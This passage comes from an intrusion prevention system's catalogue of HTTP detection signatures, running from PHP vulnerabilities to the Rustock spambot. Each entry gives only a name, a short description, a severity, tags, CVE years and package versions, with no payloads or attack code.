Last changed: sgpkg-ips-1401-5242
Vulnerability: Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service
Description:
Back to top

HTTP_CS-PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in PHP-Fusion detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP-Fusion, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1263-5242
Vulnerability: PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Php-Globals-Parameter-Usage

About this situation: Detects PHP GLOBALS parameter usage
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-192-2032
Vulnerability: HTTP-Php-Globals-Parameter-Usage
Description:
Back to top

HTTP_CS-Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access
Description:
Back to top

HTTP_CS-Php-Memory_Limit-Vulnerability

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2004, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Php-Memory-Limit-Code-Execution-Vulnerability
Description:
Back to top

HTTP_CS-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability

About this situation: Detects PHP GLOBALS overwrite attempts from HTTP POST requests
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability
Description:
Back to top

HTTP_CS-Php-OLE-File-Handling-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Php-OLE-File-Handling-Infinite-Loop
Description:
Back to top

HTTP_CS-Php-Phpinfo-XSS-Post

About this situation: Vulnerable call to PHP phpinfo()
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Vulnerability: HTTP-Php-Phpinfo-XSS
Description:
Back to top

HTTP_CS-Php-POST-File-Upload-Buffer-Overflow

About this situation: Detects crafted HTTP multipart/form-data POST requests to PHP
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2002, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: Php-HTTP-POST-File-Upload-Buffer-Overflow
October-CMS-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Phpbb-Admin-Cash-Php-System-Compromise

About this situation: PhpBB admin_cash.php arbitrary php code execution
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PhpBB, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Phpbb-Admin-Cash-Php-System-Compromise
Description:
Back to top

HTTP_CS-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal

About this situation: PhpGedView editconfig_gedcom.php directory traversal vulnerability
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, PhpGedView, CVE2004, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal
Description:
Back to top

HTTP_CS-PhpGedView-Login-Path-Disclosure

About this situation: Phpgedview path disclosure attempt
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, PhpGedView, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-PhpGedView-Login-Path-Disclosure
Description:
Back to top

HTTP_CS-Phpmyadmin-Tbl_replace.php-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in phpMyAdmin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Phpmyadmin-Tbl_replace.php-Local-File-Inclusion
Description:
Back to top

HTTP_CS-PHPStudy-Backdoor-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in PHPStudy detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHPStudy, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: PHPStudy-Backdoor-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Pi-Hole-Top-Domains-API-Authenticated-Exec

About this situation: An attempt to exploit a vulnerability in the Pi-Hole Web Interface detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1434-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Pi-Hole-Top-Domains-API-Authenticated-Exec
Description:
Back to top

HTTP_CS-Pimcore-Key-Field-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Pimcore Pimcore detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1448-5242
Vulnerability: Pimcore-Key-Field-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Pimcore-Multiselect-Getfilterconditionext-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Pimcore Pimcore detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1662-5242
Last changed: sgpkg-ips-1662-5242
Vulnerability: Pimcore-Multiselect-Getfilterconditionext-SQL-Injection
Description:
Back to top

HTTP_CS-Pimcore-Searchcontroller.PHP-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Pimcore Pimcore detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Pimcore-Searchcontroller.PHP-SQL-Injection
Description:
Back to top

HTTP_CS-PingPull-Trojan-C2-HTTP-Traffic

About this situation: PingPull remote access trojan command and control traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Vulnerability: PingPull-Trojan-C2-Traffic
Description:
Back to top

HTTP_CS-Pony-Downloader-C2-Traffic

About this situation: Pony Downloader C2 traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: Pony-Downloader-C2-Traffic
Description:
Back to top

HTTP_CS-Post-Request-To-IP-Address-Root-Directory

About this situation: A HTTP post request to root directory with IP address as host detected
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1373-5242
Description:
Back to top

HTTP_CS-Progea-Movicon-EIDP-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Progea Movicon detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Progea Movicon, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Progea-Movicon-EIDP-Denial-Of-Service
Description:
Back to top

HTTP_CS-Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Progress Software MOVEit Transfer detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection
Description:
Back to top

HTTP_CS-Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in MOVEit detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1613-5242
Last changed: sgpkg-ips-1613-5242
Vulnerability: Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection
Description:
Back to top

HTTP_CS-Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Vulnerability: Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Progress Software WS_FTP Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software WS_FTP Server, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1637-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization
Description:
Back to top

HTTP_CS-PRTG-CVE-2023-32781-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in PRTG Network Monitor detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, PRTG Network Monitor, CVE2023, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: PRTG-CVE-2023-32781-Authenticated-RCE
Description:
Back to top

HTTP_CS-PSO-Proxy-v0.91-Stack-Buffer-Overflow

About this situation: Buffer overflow in PSO Proxy v0.91 Web Server
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, PSO Proxy Web Server, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: PSO-Proxy-v0.91-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-Pulse-Secure-VPN-Gzip-RCE

About this situation: An attempt to exploit a vulnerability in Pulse Secure VPN detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pulse Secure VPN, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Vulnerability: Pulse-Secure-VPN-Gzip-RCE
Description:
Back to top

HTTP_CS-Put-Nikto-Test

About this situation: Upload.cgi
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-563-5211
Vulnerability: Nikto-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CS-pyLoad-js2py-Python-Execution

About this situation: An attempt to exploit a vulnerability in pyLoad detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, pyLoad, CVE2023, Unix not specific, Linux not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1564-5242
Vulnerability: pyLoad-js2py-Python-Execution
Description:
Back to top

HTTP_CS-pyLoad-RCE-With-js2py-Sandbox-Escape

About this situation: An attempt to exploit a vulnerability in Pyload detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, pyLoad, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1802-5242
Vulnerability: pyLoad-RCE-With-js2py-Sandbox-Escape
Description:
Back to top

HTTP_CS-Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow

About this situation: Qbik WinGate WWW Proxy Server 6.1.1.1077 Stack Based Buffer Overflow
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Qbik WinGate, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CS-Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265

About this situation: An attempt to exploit a vulnerability in Qlik Sense detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Qlik Sense, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1660-5242
Last changed: sgpkg-ips-1719-5242
Vulnerability: Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265
Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-48365
Description:
Back to top

HTTP_CS-QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218

About this situation: An attempt to exploit a vulnerability in QNAP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP QTS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1693-5242
Last changed: sgpkg-ips-1693-5242
Vulnerability: QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218
Description:
Back to top

HTTP_CS-Quest-Kace-Systems-Management-Run_Report-Command-Injection

About this situation: An attempt to exploit a vulnerability in Quest Software KACE Systems Management detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software KACE Systems Management, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1106-5242
Vulnerability: Quest-Kace-Systems-Management-Run_Report-Command-Injection
Description:
Back to top

HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Quest Software NetVault Backup detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software NetVault Backup, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass
Description:
Back to top

HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Quest Software NetVault Backup detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software NetVault Backup, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1806-5242
Vulnerability: Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-Ranbyus.G-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Spyware.Ranbyus.G-Botnet
Description:
Back to top

HTTP_CS-Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness

About this situation: An attempt to exploit a vulnerability in Rank Math Wordpress SEO Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1240-5242
Vulnerability: Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness
Description:
Back to top

HTTP_CS-RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload

About this situation: An attempt to exploit a vulnerability RaspberryMatic detected
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, RaspberryMatic, CVE2024, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload
Description:
Back to top

HTTP_CS-rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-rConfig-Vendors-Authenticated-File-Upload-RCE

About this situation: An attempt to exploit a vulnerability in rConfig detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Vulnerability: rConfig-Vendors-Authenticated-File-Upload-RCE
Description:
Back to top

HTTP_CS-Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Red Hat JBoss BPMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, JBoss, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Red Hat JBoss Seam detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat JBoss Enterprise Application Platform, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure
Description:
Back to top

HTTP_CS-Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943

About this situation: An attempt to exploit a vulnerability in Rejetto HTTP File Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rejetto HttpFileServer, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
Description:
Back to top

HTTP_CS-Rejetto-HTTP-File-Server-Possible-Command-Injection-CVE-2024-39943

About this situation: An attempt to exploit a vulnerability in Rejetto HTTP File Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rejetto HttpFileServer, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
Description:
Back to top

HTTP_CS-Request-To-Suspicious-File

About this situation: Request to suspicious file over http detected
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1790-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CS-Request-To-Suspicious-File-With-Obsolete-Browser

About this situation: Request to suspicious file over http detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CS-Request-To-Suspicious-Poc-File

About this situation: Request to suspicious file over http detected
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CS-Request-To-Suspicious-Poc-File-With-Obsolete-Browser

About this situation: Request to suspicious file over http detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CS-Ruby-On-Rails-Devise-Password-Reset

About this situation: An attempt to exploit a Ruby On Rails Devise Password Reset vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1408-5242
Vulnerability: Ruby-On-Rails-Devise-Password-Reset
Description:
Back to top

HTTP_CS-Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution

About this situation: An attempt to exploit a vulnerability in Ruby on Rails web development framework detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-640-5211
Vulnerability: Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution
Description:
Back to top

HTTP_CS-Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Ruby on Rails web development framework detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-503-5211
Vulnerability: Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability
Description:
Back to top

HTTP_CS-Rustdoor-Command-and-Control-Traffic

About this situation: Rustdoor command and control traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Mac OS, Any Hardware, Windows not specific, Mac OS not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: Rustdoor-Command-and-Control-Traffic
Description:
Back to top

HTTP_CS-Rustock-Bot-Traffic

About this situation: Rustock Bot traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Rustock-Bot
Description:
Back to top

HTTP_CS-Rustock-Spambot

About this situation: Rustock spambot command and control channel communication detected
Context: HTTP Client Stream
Severity: 7
